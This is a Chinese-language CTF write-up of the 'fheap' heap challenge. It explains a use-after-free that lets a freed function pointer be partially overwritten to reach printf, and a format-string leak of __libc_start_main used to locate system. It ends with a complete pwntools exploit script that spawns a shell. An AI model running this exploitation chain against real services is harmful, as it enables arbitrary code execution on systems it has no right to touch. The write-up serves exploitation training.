CTF-PWN-堆-【use after free-2】

文章目录

    • fheap libc 2.23 64位
      • 检查
      • main
      • create
      • delete
    • 思路
    • 覆盖目标函数的指针
    • printf内部
    • 调用覆盖的函数前
    • 调用 printf时的栈
    • 实际去的函数的地方
    • 查找当前版本对应的libc_start_main和system
    • 计算出system的libc基地址
    • exp

fheap libc 2.23 64位

检查

CTF-PWN-堆-【use after free-2】_第1张图片

main

多层while,其实和选择也差不多
CTF-PWN-堆-【use after free-2】_第2张图片

create

分配0x20的堆,指针赋值给ptr
首先输入size大小
然后输入到buf当中
再看实际的buf的有多少,如果大于15就用malloc分配实际长度的堆,其指针为dest,然后将buf的内容复制进去,同时更新ptr里的内容,前八个字节为dest的值然后初始地址过24个字节开始被赋值函数的地址,此时对应的函数free两次,先free存储内容的指针,再free原ptr指针
如果小于15,就直接将buf的内容赋值到ptr的开始部分,然后初始地址过24个字节开始被赋值函数的地址,此时对应的函数free一次
最后将遍历unk_2020c0数组 ,每个数组元素16个字节,前八个字节赋值为1,后八个字节赋值为ptr
CTF-PWN-堆-【use after free-2】_第3张图片CTF-PWN-堆-【use after free-2】_第4张图片
CTF-PWN-堆-【use after free-2】_第5张图片

delete

先根据索引检查unk_2020c0后24个字节是否为值,有值则存在这个string,然后输入yes后调用ptr中的free函数,参数为ptr,最后将此时索引的unk_2020c0前八个字节设置为0CTF-PWN-堆-【use after free-2】_第6张图片

思路

依然存在use after free漏洞,可以使得create时能得到可以修改原来存储string相关信息的堆中的存储函数指针的内容

首先create两次,此时只有两个堆,都是0x20,且都存储string的相关信息(delete时的调用的函数指针),然后申请一个大小0x20的string,此时可利用格式化字符串泄露某个函数的地址,然后得到libc基地址,然后再得到system的地址
然后delete该申请的string 再次create此时可以重写之前一开始id为1的堆块内容中的函数指针,此时为system的函数地址,并且刚该开始的堆内容为/bin/sh,此时再次delete(1)即可成功getshell

覆盖目标函数的指针

选用printf函数指针
函数装入内存时,由于地址随机化不会影响到低12位的值,此时可能可以成功覆盖到目的函数
CTF-PWN-堆-【use after free-2】_第7张图片

在这里插入图片描述

printf内部

test指令(按位与)检查如果不是零就会执行movaps

movaps指令处理的内存位置必须是十六字节对齐的

如果不是零,就没有跳转,那么会执行movaps,满足十六字节对齐比较麻烦
所以我们先通过执行前面的存在的赋值ax为零的指令即可
CTF-PWN-堆-【use after free-2】_第8张图片

调用覆盖的函数前

CTF-PWN-堆-【use after free-2】_第9张图片

EAX与AX不是独立的,EAX是32位的寄存器,而AX是EAX的低16位。
举例来说
mov eax, 12345678h
那么AX将会是eax的低16位,也就是5678h。
而如果此时
mov ax,3344h
那么eax的值将变为12343344h,所以对ax的赋值是会影响eax的。
同样,AH是ax的高8位,而AL是ax的低8位,这就是说ah为33h,al为44h。

跳转后先执行mov eax,0
CTF-PWN-堆-【use after free-2】_第10张图片

调用 printf时的栈

CTF-PWN-堆-【use after free-2】_第11张图片
栈的第172个是libc_start_main+240

CTF-PWN-堆-【use after free-2】_第12张图片

实际去的函数的地方

所以此时还需输入,此时想直接跳过这个地方输入只要输入一次-1就好了
CTF-PWN-堆-【use after free-2】_第13张图片

查找当前版本对应的libc_start_main和system

CTF-PWN-堆-【use after free-2】_第14张图片
CTF-PWN-堆-【use after free-2】_第15张图片

计算出system的libc基地址

CTF-PWN-堆-【use after free-2】_第16张图片
CTF-PWN-堆-【use after free-2】_第17张图片

CTF-PWN-堆-【use after free-2】_第18张图片

CTF-PWN-堆-【use after free-2】_第19张图片

exp

from pwn import *
context(os="linux",arch="amd64",log_level="debug")
s=process("./pwn-f")
libc=ELF("./libc-2.23.so")
f=ELF("./pwn-f")
# gdb.attach(s,"b main")

def create(size,string):
    s.sendlineafter(b"3.quit\n",b"create ")
    s.sendlineafter(b"Pls give string size:",str(size))
    s.sendafter(b"str:",string)# 注意此时不能用sendlineafter,内容中会在后面有一个换行府,在覆盖函数底地址会多覆盖一个字节

def delete(id):
    s.sendlineafter(b"3.quit\n",b"delete ")
    s.sendlineafter(b"id:",str(id))
    s.sendlineafter(b"Are you sure?:",b"yes")


create(8, "ab") 
create(8, "ab") 

delete(1)
delete(0)

create(0x20, b'_libc_s_m+240:%176$pend'.ljust(0x18, b'c') + p8(0xB6))  # 0

delete(1)

s.recvuntil(b"_libc_s_m+240:")
libc_start_main_240= s.recvuntil("end", drop=True) # False是包括end

print(type(libc_start_main_240))
libc_start_main_240=int(libc_start_main_240,16) # 0x 形式的字节的转化为16进制数

system_addr = libc_start_main_240-240-0x20750+0x453a0

print("__libc_start_main_240: " + hex(libc_start_main_240))
print("system address: " + hex(system_addr))

s.sendline("-1")
delete(0)

create(0x20, b"/bin/sh;".ljust(24, b"p") + p64(system_addr))

delete(1)

s.interactive()

你可能感兴趣的:(CTF-PWN-堆,PWN)